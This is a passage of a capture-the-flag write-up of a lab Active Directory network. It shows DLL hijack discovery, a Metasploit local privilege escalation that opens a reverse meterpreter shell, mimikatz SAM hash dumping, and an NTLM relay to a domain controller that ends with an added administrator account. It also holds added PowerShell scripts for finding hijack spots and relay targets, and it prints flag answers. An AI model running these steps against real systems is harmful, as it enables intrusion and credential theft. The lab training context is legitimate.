- Finally, we set a filter for Result that contains NAME NOT FOUND (a second Result filter for PATH NOT FOUND is worth adding too, as it catches the case where a whole directory in the search order is missing):
- You should now have the following 3 new filters below:
- Press the OK button to apply the filters and get out of the Process Monitor Filter window – you will be presented with a list of hits, and we need to find a "CreateFile" attempt in a location we can write to (for persistence, this can be any DLL that doesn’t already exist, since we can write anywhere once we are SYSTEM – hence using something in C:\Windows is better to mitigate detection)… below shows the DLL we are going to target:
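ProcMon’s NAME NOT FOUND hits tell you where an application looked; the remaining questions are whether any of those places is writable by the account you hold and whether the DLL is even eligible for hijacking. The script below is an added example written for this walkthrough, not code from the room or from ProcMon: it rebuilds the default DLL search order (honouring SafeDllSearchMode), skips KnownDLLs, and probes each directory for write access by creating and deleting a temporary file. The kavremover.exe path and the DLL name example.dll in the usage line are assumptions; substitute the actual hits from your own capture.

```powershell
# Added example, not from the room or the original walkthrough. Given an executable
# and the DLL names ProcMon reported as NAME NOT FOUND, reproduce the loader's
# search order and report the first writable directory in which a planted DLL
# would be picked up. For *privilege escalation* the loading process must run as a
# more privileged account than ours (an Administrator/SYSTEM scheduled task or
# service); otherwise this only gives persistence.

function Get-DllSearchOrder {
    param([Parameter(Mandatory)][string]$ExePath)
    $appDir = [IO.Path]::GetDirectoryName([IO.Path]::GetFullPath($ExePath))
    $sys32  = [Environment]::GetFolderPath('System')      # C:\Windows\System32
    $winDir = [Environment]::GetFolderPath('Windows')     # C:\Windows
    $sys16  = Join-Path $winDir 'System'                  # 16-bit system directory, still searched
    $cwd    = (Get-Location).ProviderPath
    # SafeDllSearchMode is on unless the value exists and is 0; when it is off the
    # current directory is searched right after the application directory, ahead of System32.
    $safe = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager' -ErrorAction SilentlyContinue).SafeDllSearchMode
    $fixed = if ($safe -eq 0) { @($appDir, $cwd, $sys32, $sys16, $winDir) }
             else             { @($appDir, $sys32, $sys16, $winDir, $cwd) }
    # PATH entries come last; a writable PATH directory is a classic hijack location
    $fixed + @($env:Path -split ';' | Where-Object { $_ -and (Test-Path -LiteralPath $_) })
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Dir)
    # Only a real create honours every ACE, deny entry and integrity label. It leaves a
    # short-lived zero-byte file behind, so note it for your OPSEC log.
    $probe = Join-Path $Dir ('~' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::Create($probe).Dispose()
        Remove-Item -LiteralPath $probe -Force -ErrorAction Stop
        $true
    } catch { $false }
}

function Get-KnownDlls {
    # KnownDLLs are mapped from System32 before the search order runs at all, so a
    # NAME NOT FOUND hit on one of them is not hijackable from a user-writable folder.
    $k = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
    $k.PSObject.Properties | Where-Object { $_.Value -is [string] -and $_.Value -like '*.dll' } |
        ForEach-Object { $_.Value }
}

function Find-DllHijackCandidates {
    param([Parameter(Mandatory)][string]$ExePath,
          [Parameter(Mandatory)][string[]]$MissingDll)   # names from the ProcMon filter
    $known = Get-KnownDlls
    $order = Get-DllSearchOrder -ExePath $ExePath
    foreach ($dll in $MissingDll) {
        if ($known -contains $dll) { Write-Warning "$dll is a KnownDLL, skipping"; continue }
        foreach ($dir in $order) {
            $full = Join-Path $dir $dll
            # If a real copy exists here the loader stops; later directories are never reached
            if (Test-Path -LiteralPath $full) { break }
            if (Test-DirectoryWritable -Dir $dir) {
                [pscustomobject]@{ Dll = $dll; PlantAt = $full; SearchPosition = [array]::IndexOf($order, $dir) }
                break
            }
        }
    }
}

# Usage: assumed path and DLL name; replace with the hits from your own ProcMon capture
Find-DllHijackCandidates -ExePath 'C:\Users\watamet\Downloads\kavremover.exe' -MissingDll 'example.dll'
```

A hit whose PlantAt lies under C:\Windows with SearchPosition 1 or 2 is the interesting case for escalation, since those directories are normally writable only by administrators; a hit in the application directory or a PATH entry is the usual finding on badly installed third-party software.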
NOTE: As suspected, the scheduled task for the app we are supposed to DLL hijack does not exist (hence why I couldn’t find it during the scheduled task check done in task #…), so after hours of failures on all sorts of other attempts I finally loaded up a meterpreter session on PC-FILESRV01 as watamet and ran multi/recon/local_exploit_suggester on the unprivileged session…
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.200.110.35 - Collecting local exploits for x64/windows...
[*] 10.200.110.35 - 31 exploit checks are being tried...
[+] 10.200.110.35 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.200.110.35 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.200.110.35 - exploit/windows/local/cve_2020_17136: The target appears to be vulnerable. A vulnerable Windows 10 v1809 build was detected!
[+] 10.200.110.35 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Post module execution completed
PRIVESC >> pwning PC-FILESRV01 using CVE-2021-40449 local privesc
msf6 exploit(windows/local/cve_2021_40449) > run
[*] Started reverse TCP handler on 10.50.107.119:6969
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target's build number: 10.0.17763.1577
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching netsh to host the DLL...
[+] Process 4924 launched.
[*] Reflectively injecting the DLL into 4924...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 10.200.110.35
[*] Meterpreter session 3 opened (10.50.107.119:6969 -> 10.200.110.35:50000 ) at 2022-01-30 19:14:14 +1100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
LOOT >> PC-FILESRV01 root.txt!
C:\Users\Administrator\Desktop>type root.txt
type root.txt
<REDACTED>
FLAG - PC-FILESRV01 root.txt
LOOT >> lsadump::sam on PC-FILESRV01 – Administrator NTLM hash for Evil-WinRM!
mimikatz(powershell) # lsadump::sam
Domain : PC-FILESRV01
SysKey : 51412f14c5f14da393f8fa29e1670300
Local SID : S-1-5-21-4241685735-4112329853-1893400299
SAMKey : 65d982c48195c316cdb93707443dd4c1
RID : 000001f4 (500)
User : Administrator
Hash NTLM: <REDACTED>
...
CREDS - Administrator NTLM hash
What is the first listed vulnerable DLL located in the Windows folder from the application?
Task 45-47 – NTLM Relay – …
I am combining these 3 tasks because most of the material is not really necessary to repeat here; if the theory is needed, go read the details in those tasks.
Below are the steps required to perform the SMB relay attack. It uses ntlmrelayx.py from Impacket to listen for SMB connections, capture the user’s Net-NTLMv2 authentication and relay it to the target (keeping the authenticated session open through its SOCKS proxy), a meterpreter reverse port forward to push all SMB traffic arriving at PC-FILESRV01 back to us, and secretsdump.py from Impacket to dump all those juicy credz!
To pull this off we need a target where SMB signing is not required, so the relayed session cannot be rejected for lacking a signature that only the real client could compute. Domain controllers require signing by default, but DC-SRV01 happens to have it turned off. 😉 (Relaying back to the host the authentication came from has been blocked since MS08-068, which is why the capture point and the target are different machines.)
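Whether a host is a usable relay target is decided by one field, SecurityMode, in the server’s SMB2 NEGOTIATE response; nmap’s smb2-security-mode script and crackmapexec’s --gen-relay-list read exactly this. The function below is an added example written for this walkthrough (it is not part of the room or of Impacket) that performs the negotiate by hand from PowerShell, so it needs no credentials, no admin rights and no SMB module. The IPs in the usage line are the lab’s DC-SRV01 and PC-FILESRV01.

```powershell
# Added example, not from the room or the original walkthrough: a raw SMB2
# NEGOTIATE that reads the server's SecurityMode flags (MS-SMB2 2.2.4).
# SigningRequired = False is the precondition ntlmrelayx needs in a target.

function Read-Exactly {
    param([Parameter(Mandatory)]$Stream, [Parameter(Mandatory)][int]$Count)
    $buf = [byte[]]::new($Count); $off = 0
    while ($off -lt $Count) {
        $n = $Stream.Read($buf, $off, $Count - $off)
        if ($n -le 0) { throw "peer closed the connection after $off of $Count bytes" }
        $off += $n
    }
    return $buf
}

function Read-NbtMessage {
    # NetBIOS Session Service framing: 1 byte type (0x00 = session message), 3 bytes big-endian length
    param([Parameter(Mandatory)]$Stream)
    $h = Read-Exactly $Stream 4
    $len = ([int]$h[1] -shl 16) -bor ([int]$h[2] -shl 8) -bor [int]$h[3]
    return Read-Exactly $Stream $len
}

function Get-SmbNegotiateSecurityMode {
    param([Parameter(Mandatory)][string]$ComputerName, [int]$Port = 445, [int]$TimeoutMs = 5000)

    # SMB2 header, 64 bytes (MS-SMB2 2.2.1.2). First request: MessageId/TreeId/SessionId
    # are zero and the signature is all zeros because nothing is signed yet.
    $hdr = [System.Collections.Generic.List[byte]]::new()
    $hdr.AddRange([byte[]](0xFE, 0x53, 0x4D, 0x42))   # ProtocolId "\xFESMB"
    $hdr.AddRange([byte[]](0x40, 0x00))                # StructureSize = 64
    $hdr.AddRange([byte[]]::new(2))                    # CreditCharge
    $hdr.AddRange([byte[]]::new(4))                    # Status / ChannelSequence
    $hdr.AddRange([byte[]]::new(2))                    # Command = 0x0000 SMB2 NEGOTIATE
    $hdr.AddRange([byte[]](0x01, 0x00))                # CreditRequest
    $hdr.AddRange([byte[]]::new(4))                    # Flags
    $hdr.AddRange([byte[]]::new(4))                    # NextCommand
    $hdr.AddRange([byte[]]::new(8))                    # MessageId
    $hdr.AddRange([byte[]]::new(4))                    # Reserved
    $hdr.AddRange([byte[]]::new(4))                    # TreeId
    $hdr.AddRange([byte[]]::new(8))                    # SessionId
    $hdr.AddRange([byte[]]::new(16))                   # Signature

    # NEGOTIATE request body (MS-SMB2 2.2.3). Offering dialects up to 3.0.2 but not 3.1.1
    # keeps the request free of negotiate contexts while still matching Server 2012 R2+.
    $dialects = [uint16[]](0x0202, 0x0210, 0x0300, 0x0302)
    $body = [System.Collections.Generic.List[byte]]::new()
    $body.AddRange([byte[]](0x24, 0x00))                               # StructureSize = 36
    $body.AddRange([BitConverter]::GetBytes([uint16]$dialects.Length)) # DialectCount
    $body.AddRange([byte[]](0x01, 0x00))                               # SecurityMode: we support signing, do not require it
    $body.AddRange([byte[]]::new(2))                                   # Reserved
    $body.AddRange([byte[]]::new(4))                                   # Capabilities
    $body.AddRange([guid]::NewGuid().ToByteArray())                    # ClientGuid
    $body.AddRange([byte[]]::new(8))                                   # ClientStartTime
    foreach ($d in $dialects) { $body.AddRange([BitConverter]::GetBytes([uint16]$d)) }

    $smb = [byte[]]($hdr.ToArray() + $body.ToArray())
    $len = $smb.Length
    $nbt = [byte[]](0x00, (($len -shr 16) -band 0xFF), (($len -shr 8) -band 0xFF), ($len -band 0xFF))
    $packet = [byte[]]($nbt + $smb)

    $client = [System.Net.Sockets.TcpClient]::new()
    try {
        if (-not $client.ConnectAsync($ComputerName, $Port).Wait($TimeoutMs)) { throw "connect to ${ComputerName}:$Port timed out" }
        $stream = $client.GetStream(); $stream.ReadTimeout = $TimeoutMs
        $stream.Write($packet, 0, $packet.Length)
        $resp = Read-NbtMessage $stream
    } finally { $client.Dispose() }

    if ($resp.Length -lt 72 -or $resp[0] -ne 0xFE -or [Text.Encoding]::ASCII.GetString($resp, 1, 3) -ne 'SMB') {
        throw "no SMB2 response from $ComputerName (SMB1-only host, or something else on port $Port)"
    }
    $status = [BitConverter]::ToUInt32($resp, 8)
    if ($status -ne 0) { throw ('NEGOTIATE rejected, NTSTATUS 0x{0:X8}' -f $status) }
    # Response body starts at offset 64: StructureSize(2) SecurityMode(2) DialectRevision(2) ...
    $mode    = [BitConverter]::ToUInt16($resp, 66)
    $dialect = [BitConverter]::ToUInt16($resp, 68)
    [pscustomobject]@{
        ComputerName    = $ComputerName
        Dialect         = ('0x{0:X4}' -f $dialect)
        SigningEnabled  = (($mode -band 0x01) -ne 0)   # SMB2_NEGOTIATE_SIGNING_ENABLED
        SigningRequired = (($mode -band 0x02) -ne 0)   # SMB2_NEGOTIATE_SIGNING_REQUIRED
        RelayTarget     = (($mode -band 0x02) -eq 0)   # not required => a relayed session will be accepted
    }
}

# Usage against the lab hosts (IPs from the walkthrough): DC-SRV01 and PC-FILESRV01
'10.200.110.30', '10.200.110.35' | ForEach-Object { Get-SmbNegotiateSecurityMode -ComputerName $_ } | Format-Table -AutoSize
```

The fix on the defender’s side is the setting a domain controller carries by default: Set-SmbServerConfiguration -RequireSecuritySignature $true on the host, or the GPO "Microsoft network server: Digitally sign communications (always)". Once that is in place the same function reports SigningRequired True and the relay attempt below fails at the SMB layer rather than at authentication.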
PRIVESC >> SMB relay attack!
- Stopping and disabling the SMB server (lanmanserver) and workstation (lanmanworkstation) services on PC-FILESRV01, then rebooting, so that TCP 445 is free for the meterpreter reverse port forward (netlogon, which depends on the workstation service, is stopped first; the reboot also kills the meterpreter session, which has to be re-established afterwards)
meterpreter > shell
Process 4624 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1577]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>sc stop netlogon
sc stop netlogon
SERVICE_NAME: netlogon
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0xea60
C:\Windows\system32>sc stop lanmanserver
sc stop lanmanserver
SERVICE_NAME: lanmanserver
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x4e20
C:\Windows\system32>sc config lanmanserver start= disabled
sc config lanmanserver start= disabled
[SC] ChangeServiceConfig SUCCESS
C:\Windows\system32>sc stop lanmanworkstation
sc stop lanmanworkstation
[SC] ControlService FAILED 1051:
A stop control has been sent to a service that other running services are dependent on.
C:\Windows\system32>sc config lanmanworkstation start= disabled
sc config lanmanworkstation start= disabled
[SC] ChangeServiceConfig SUCCESS
C:\Windows\system32>shutdown /r
shutdown /r
C:\Windows\system32>[*] 10.200.110.35 - Meterpreter session 6 closed. Reason: Died
- Starting NTLMRelayX on attack box
❯ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -t smb://10.200.110.30 -smb2support -socks
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] SMB Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> * Serving Flask app "impacket.examples.ntlmrelayx.servers.socksserver" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] SMBD-Thread-8: Connection from HOLOLIVE/SRV-ADMIN@10.50.107.119 controlled, attacking target smb://10.200.110.30
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] Authenticating against smb://10.200.110.30 as HOLOLIVE/SRV-ADMIN SUCCEED
[*] SOCKS: Adding HOLOLIVE/SRV-ADMIN@10.200.110.30(445) to active SOCKS connection. Enjoy
- Setting up the port forward via meterpreter (SYSTEM session on PC-FILESRV01): listen on 445 on PC-FILESRV01 and hand every connection to ntlmrelayx on 10.50.107.119:445, so any host that authenticates to PC-FILESRV01 over SMB is actually talking to the relay
meterpreter > portfwd add -R -L 10.50.107.119 -l 445 -p 445
[*] Local TCP relay created: 10.50.107.119:445 <-> :445
PRIVESC >> adding an account to the Administrators group on DC-SRV01 via the ntlmrelayx SOCKS proxy and smbexec (on a domain controller this creates a domain user and puts it in the domain’s built-in Administrators group)
sudo proxychains python3 /opt/impacket/examples/smbexec.py -no-pass HOLOLIVE/SRV-ADMIN@10.200.110.30
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.25.dev1+20220128.170256.e007046d - Copyright 2021 SecureAuth Corporation
|S-chain|-<>-127.0.0.1:1080-<><>-10.200.110.30:445-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>net user stimpz0r r00t3d! /add
The command completed successfully.
C:\Windows\system32>net localgroup Administrators /add stimpz0r
The command completed successfully.
CREDS - secretsdump from DC-SRV01 - domain PWNED!
LOOT >> DC-SRV01 root.txt!
❯ evil-winrm -i 10.200.110.30 -u stimpz0r -p 'r00t3d!'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\stimpz0r\Documents> cd ..\..\Administrator
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
<REDACTED>
FLAG - DC-SRV01 root.txt
Cleaning up for the other users! 😉
meterpreter > shell
Process 3432 created.
Channel 224 created.
Microsoft Windows [Version 10.0.17763.1577]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>sc config lanmanworkstation start= auto
sc config lanmanworkstation start= auto
[SC] ChangeServiceConfig SUCCESS
C:\Windows\system32>sc config lanmanserver start= auto
sc config lanmanserver start= auto
[SC] ChangeServiceConfig SUCCESS
C:\Windows\system32>sc start lanmanworkstation
sc start lanmanworkstation
SERVICE_NAME: lanmanworkstation
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 544
FLAGS :
C:\Windows\system32>sc start lanmanserver
sc start lanmanserver
SERVICE_NAME: lanmanserver
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2564
FLAGS :
C:\Windows\system32>sc start netlogon
sc start netlogon
SERVICE_NAME: netlogon
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 740
FLAGS : RUNS_IN_SYSTEM_PROCESS
Empire loaded with SYSTEM/root agents from all pwned boxes on Holo!
(yes the bottom one is L-SRV01 – for some reason python agents do not report their IP)
What flag can be found after rooting L-SRV01?
The flag is – HOLO{3792d7d80c4dcabb8a533afddf06f666}
What flag can be found after rooting L-SRV01?
HOLO{e16581b01d445a05adb2e6d45eb373f7}